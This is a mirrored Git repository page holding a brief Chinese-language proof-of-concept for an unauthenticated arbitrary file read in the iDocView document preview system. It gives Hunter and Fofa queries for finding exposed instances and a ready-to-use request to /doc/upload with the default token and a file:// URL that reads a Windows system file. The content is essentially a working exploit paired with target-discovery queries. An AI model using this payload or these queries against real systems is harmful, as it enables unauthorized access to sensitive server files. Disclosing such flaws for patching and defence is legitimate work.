POC/iDocView upload接口任意文件读取.md at 9e049b58857d09940c3537201b334a86067b6c0f

admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

iDocView upload接口任意文件读取

iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞，未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息，使系统处于极度不安全的状态。

Hunter语法：
app.name="I Doc View"
Fofa语法：
title="I Doc View"

http://xxxxxx/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt